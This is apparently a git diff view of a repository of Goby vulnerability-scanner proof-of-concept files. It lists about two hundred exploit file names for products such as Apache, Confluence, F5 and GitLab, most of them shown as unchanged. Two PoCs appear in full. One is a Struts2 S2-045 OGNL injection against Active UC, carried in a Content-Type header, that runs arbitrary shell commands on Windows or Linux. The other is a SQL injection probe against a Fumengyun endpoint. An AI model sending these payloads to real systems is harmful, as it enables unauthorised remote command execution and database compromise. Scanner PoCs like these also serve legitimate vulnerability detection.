Showing first 200 files as there are too many
-
-
-
lib/goby/goby_pocs/ADSelfService_Plus_RCE_CVE-2021-40539.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/ADSelfService_Plus_RCE_CVE_2021_40539.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/AVCON6_org_execl_download.action_file_down.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
1 1 { 2 - "Name": "Active UC index.action RCE", 2 + "Name": "Active UC index.action 远程命令执行漏洞", 3 3 "Level": "3", 4 4 "Tags": [ 5 5 "RCE" 6 6 ], 7 7 "GobyQuery": "title=\"网动统一通信平台(Active UC)\"", 8 - "Description": "", 9 - "Product": "Active UC", 10 - "Homepage": "http://www.iactive.com.cn/", 11 - "Author": "", 12 - "Impact": "Active UC index.action has a RCE vulnerability.", 13 - "Recommendation": "update", 14 - "References": [], 15 - "HasExp": true, 16 - "ExpParams": [ 17 - { 18 - "Name": "cmd", 19 - "Type": "input", 20 - "Value": "whoami" 21 - } 8 + "Description": "网动统一通信平台 Active UC index.action 存在S2-045远程命令执行漏洞, 通过漏洞可以执行任意命令", 9 + "Product": "网动统一通信平台(Active UC)", 10 + "Homepage": "https://gobies.org/", 11 + "Author": "luckying", 12 + "Impact": "", 13 + "Recommandation": "", 14 + "References": [ 15 + "https://gobies.org/" 22 16 ], 23 - "ExpTips": { 24 - "Type": "", 25 - "Content": "" 26 - }, 17 + "HasExp": true, 18 + "ExpParams": [ 19 + { 20 + "name": "Cmd", 21 + "type": "input", 22 + "value": "whoami", 23 + "show": "" 24 + } 25 + ], 27 26 "ScanSteps": [ 28 27 "AND", 29 28 { skipped 12 lines 42 41 "Pragma": "no-cache" 43 42 }, 44 43 "data_type": "text", 45 - "data": "-----------------------------18012721719170\r\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\r\nContent-Type: text/plain\r\n-----------------------------18012721719170" 44 + "data": "-----------------------------18012721719170\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\nContent-Type: text/plain\n-----------------------------18012721719170" 46 45 }, 47 46 "ResponseTest": { 48 47 "type": "group", skipped 11 lines 60 59 "SetVariable": [] 61 60 } 62 61 ], 63 - "ExploitSteps": [ 62 + "ExploitSteps": [ 64 63 "AND", 65 64 { 66 65 "Request": { skipped 6 lines 73 72 "Connection": "close", 74 73 "Cookie": "SessionId=96F3F15432E0660E0654B1CE240C4C36", 75 74 "Charsert": "UTF-8", 76 - "Content-Type": "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='{{{cmd}}}').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}; boundary=---------------------------18012721719170", 75 + "Content-Type": "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='{{{Cmd}}}').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}; boundary=---------------------------18012721719170", 77 76 "Cache-Control": "no-cache", 78 77 "Pragma": "no-cache" 79 78 }, 80 79 "data_type": "text", 81 - "data": "-----------------------------18012721719170\r\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\r\nContent-Type: text/plain\r\n-----------------------------18012721719170" 80 + "data": "-----------------------------18012721719170\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\nContent-Type: text/plain\n-----------------------------18012721719170" 82 81 }, 83 82 "ResponseTest": { 84 83 "type": "group", skipped 9 lines 94 93 ] 95 94 }, 96 95 "SetVariable": [ 97 - "output|lastbody|undefined|undefined" 98 - ] 96 + "output|lastbody" 97 + ] 99 98 } 100 99 ], 101 - "PostTime": "0000-00-00 00:00:00", 102 - "GobyVersion": "0.0.0" 100 + "PostTime": "2021-06-28 10:08:54", 101 + "GobyVersion": "1.8.268" 103 102 } -
lib/goby/goby_pocs/Adobe_ColdFusion_LFI_CVE-2010-2861.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Adslr_Enterprise_online_behavior_management_system_Information_leak.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Adslr_Enterprise_online_behavior_management_system_Information_leakage.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Alibaba Nacos 控制台默认弱口令.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Alibaba Nacos 未授权访问漏洞.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
-
-
lib/goby/goby_pocs/Ametys_CMS_infoleak_CVE_2022_26159.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache ActiveMQ Console控制台弱口令.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache Cocoon Xml 注入 CVE-2020-11991.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache Kylin Console 控制台弱口令.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache Kylin 未授权配置泄露 CVE-2020-13937.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache Solr任意文件读取漏洞.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_2.4.49_Path_Traversal_CVE_2021_41773.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_2.4.49_RCE_CVE_2021_41773_and_2.4.50_CVE_2021_42013.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_APISIX_Admin_API_Default_Token_CVE_2020_13945.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_APISIX_Dashboard_API_Unauthorized_Access_CVE-2021-45232.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_APISIX_Dashboard_CVE_2021_45232.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_APISIX_Dashboard_RCE_CVE_2021_45232.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_ActiveMQ_Console_Weak_Password.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_ActiveMQ_default_admin_account.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
-
lib/goby/goby_pocs/Apache_Cocoon_XML_Injection_CVE_2020_11991.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_CouchDB_Remote_Privilege_Escalation_CVE-2017-12635.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_CouchDB_Unauth.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_Druid_Abritrary_File_Read_CVE-2021-36749.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_Druid_Abritrary_File_Read_CVE_2021_36749.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_Druid_Arbitrary_File_Read_CVE_2021_36749.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_Druid_Log4shell_CVE-2021-44228.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_Druid_Log4shell_CVE_2021_44228.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_Dubbo_Admin_Default_Password.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_Flink_CVE_2020_17519.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_HTTP_Server_2.4.48_mod_proxy_SSRF_CVE_2021_40438.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_HTTP_Server_2.4.49_2.4.50_Path_Traversal_CVE_2021_42013.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_HTTP_Server_2.4.49_Path_Traversal_CVE_2021_41773.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_HTTP_Server_2.4.49_RCE_CVE_2021_41773.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_HTTP_Server_Arbitrary_File_Read_CVE_2021_41773.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_HTTP_Server_SSRF_CVE-2021-40438.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_HTTP_Server_SSRF_CVE_2021_40438.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_JSPWiki_Log4shell_CVE-2021-44228_(1).json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_JSPWiki_Log4shell_CVE-2021-44228_(2).json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_JSPWiki_Log4shell_CVE_2021_44228_1.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_JSPWiki_Log4shell_CVE_2021_44228_2.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
-
-
lib/goby/goby_pocs/Apache_OFBiz_Log4shell_CVE-2021-44228.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_OFBiz_Log4shell_CVE_2021_44228.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_ShenYu_Admin_Unauth_Access_CVE_2022_23944.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_SkyWalking_Log4shell_CVE-2021-44228.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_SkyWalking_Log4shell_CVE_2021_44228.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_Solr_Arbitrary_File_Read.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_Solr_Log4j2CVE_2021_44228.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_Solr_RemoteStreaming_File_Read.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_Struts2_S2_053_RCE_CVE_2017_12611.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_Struts2_S2_059_RCE_CVE_2019_0230.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Apache_Struts2_S2_062_RCE_CVE_2021_31805.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/AspCMS_commentList.asp_SQLinjection_vulnerability.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
-
lib/goby/goby_pocs/Atlassian Jira 信息泄露漏洞 CVE-2020-14181.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Atlassian_Confluence_OGNL_Injection_RCE_CVE_2022_26134.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
-
lib/goby/goby_pocs/Atlassian_Jira_Path_Traversal_CVE_2021_26086.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Atlassian_Jira_Seraph_Authentication_bypass_CVE_2022_0540.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Atlassian_Jira_user_information_disclosure.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Atlassian_Jira_user_information_disclosure_CVE_2020_14181.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/BSPHP_index.php_unauthorized_access_information.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/BigAnt_Server_v5.6.06_Path_Traversal_CVE_2022_23347.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/CVE_2018_19367_.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/CVE_2022_22947.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
-
lib/goby/goby_pocs/Casdoor_1.13.0_SQL_InjectionCVE_2022_24124.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
1 + { 2 + "Name": "fumengyun AjaxMethod.ashx SQL injection", 3 + "Level": "3", 4 + "Tags": [ 5 + "sqli" 6 + ], 7 + "GobyQuery": "title=\"孚盟云\"", 8 + "Description": "", 9 + "Product": "", 10 + "Homepage": "https://gobies.org/", 11 + "Author": "[email protected]", 12 + "Impact": "", 13 + "Recommendation": "", 14 + "References": [ 15 + "https://gobies.org/" 16 + ], 17 + "HasExp": true, 18 + "ExpParams": null, 19 + "ExpTips": { 20 + "Type": "", 21 + "Content": "" 22 + }, 23 + "ScanSteps": [ 24 + "AND", 25 + { 26 + "Request": { 27 + "method": "GET", 28 + "uri": "/Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Y%27", 29 + "follow_redirect": true, 30 + "header": null, 31 + "data_type": "text", 32 + "data": "", 33 + "set_variable": [] 34 + }, 35 + "ResponseTest": { 36 + "type": "group", 37 + "operation": "AND", 38 + "checks": [ 39 + { 40 + "type": "item", 41 + "variable": "$code", 42 + "operation": "==", 43 + "value": "500", 44 + "bz": "" 45 + }, 46 + { 47 + "type": "item", 48 + "variable": "$body", 49 + "operation": "contains", 50 + "value": "SELECT", 51 + "bz": "" 52 + } 53 + ] 54 + }, 55 + "SetVariable": [ 56 + "output|lastbody|regex|" 57 + ] 58 + } 59 + ], 60 + "ExploitSteps": [ 61 + "AND", 62 + { 63 + "Request": { 64 + "method": "GET", 65 + "uri": "/Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Y%27", 66 + "follow_redirect": true, 67 + "header": null, 68 + "data_type": "text", 69 + "data": "", 70 + "set_variable": [] 71 + }, 72 + "ResponseTest": { 73 + "type": "group", 74 + "operation": "AND", 75 + "checks": [ 76 + { 77 + "type": "item", 78 + "variable": "$code", 79 + "operation": "==", 80 + "value": "500", 81 + "bz": "" 82 + }, 83 + { 84 + "type": "item", 85 + "variable": "$body", 86 + "operation": "contains", 87 + "value": "SELECT", 88 + "bz": "" 89 + } 90 + ] 91 + }, 92 + "SetVariable": [ 93 + "output|lastbody|regex|" 94 + ] 95 + } 96 + ], 97 + "PostTime": "2022-07-02 21:53:57", 98 + "GobyVersion": "1.9.323" 99 + } -
lib/goby/goby_pocs/Chanjet_CRM_get_usedspace.php_sql_injection_CNVD_2021_12845.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/China_Mobile_Yu_Routing_ExportSettings.sh_Info_Leak_CNVD_2020_67110.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/China_Mobile_Yu_Routing_Login_Bypass.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/China_Mobile_Yu_Routing_Sensitive_Information_Leaks_Vulnerability.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/China_Mobile_Yu_routed_the_login_bypass.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Citrix_Unauthorized_CVE_2020_8193.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Citrix_unauthenticated_LFI_CVE-2020-8193.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
-
lib/goby/goby_pocs/ClusterEngineV4.0_RCE_.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/ClusterEngine_V4.0_Shell_cluster_RCE.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/CmsEasy_crossall_act.php_SQL_injection_vulnerability.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Coldfusion_LFI_CVE_2010_2861.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Confluence_RCE_CVE_2021_26084.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
-
lib/goby/goby_pocs/Coremail_Config_Disclosure.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Coremail_configuration_information_disclosure.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/CouchCMS_Infoleak_CVE-2018-7662.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Couch_CMS_Infoleak_CVE_2018_7662.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Couchdb_Add_User_Not_Authorized_CVE_2017_12635.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Couchdb_Unauth.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/CraftCMS_SEOmatic_Server-Side_Template_Injection_CVE-2020-9597.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/CraftCMS_Seomatic_RCE_CVE_2020_9597.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/D-Link AC集中管理系统默认弱口令.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/D-Link DCS系列监控 CNVD-2020-25078.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/D-Link DCS系列监控 账号密码信息泄露漏洞 CNVD-2020-25078.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/D-Link_AC_management_system_Default_Password.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/D-Link_DCS_2530L_Administrator_password_disclosure_CVE_2020_25078.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/D-Link_DIR-850L_Info_Leak.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/D-Link_DIR_868L_x_DIR_817LW_Info_Leak_CVE_2019_17506.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/D-Link_Info_Leak_CVE-2019-17506.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/D_Link_AC_Centralized_management_system__Default_weak_password.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/D_Link_DC_Disclosure_of_account_password_information.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/D_Link_DIR_868L_getcfg.php_Account_password_leakage.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
-
-
lib/goby/goby_pocs/DedeCMS_InfoLeak_CVE-2018-6910.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/DedeCMS_InfoLeak_CVE_2018_6910.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Discuz!ML_3.x_RCE_CNVD-2019-22239.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Discuz_ML_3.x_RCE__CNVD_2019_22239.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
-
-
-
lib/goby/goby_pocs/Dlink_850L_Info_Leak.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Dlink_Info_Leak_CVE_2019_17506.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Dlink_RCE_CVE_2019_16920.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/DocCMS_keyword_SQL_injection_Vulnerability.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
-
lib/goby/goby_pocs/DotCMS_Arbitrary_File_Upload_CVE_2022_26352.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Dubbo_Admin_Default_Password.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Eyou_Mail_System_RCE_CNVD_2021_26422.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Eyou_Mail_system_RCE.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/F5_BIG_IP_RCE_CVE_2021_22986_exp.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/F5_BIG_IP_iControl_REST_API_auth_bypass_CVE_2022_1388.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/F5_BIG_IP_iControl_REST_Unauthenticated_RCE_CVE_2021_22986.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
-
lib/goby/goby_pocs/FineReport_Directory_traversal.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/FineReport_v8.0_Arbitrary_file_read_.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/FineReport_v8.0_Fileread_CNVD_2018_04757.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/FineReport_v8.0_v9.0_Directory_Traversal.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
-
lib/goby/goby_pocs/Finetree_5MP_Network_Camera_Default_Login_unauthorized_user_add.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/Finetree_5MP_default_password_or_Unauthorized_user_added.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/GitLab Graphql邮箱信息泄露漏洞 CVE-2020-26413.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/GitLab_Graphql_Email_information_disclosure.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/GitLab_Graphql_Email_information_disclosure_CVE_2020_26413.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
lib/goby/goby_pocs/GitLab_RCE_CVE-2021-22205.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
-
lib/goby/goby_pocs/Gitlab_RCE_CVE_2021_22205.json | 100755 /~icons-ver-BEF942F0F42935333EFA072090F4E956.svg#arrow3 100644Content is identical
-
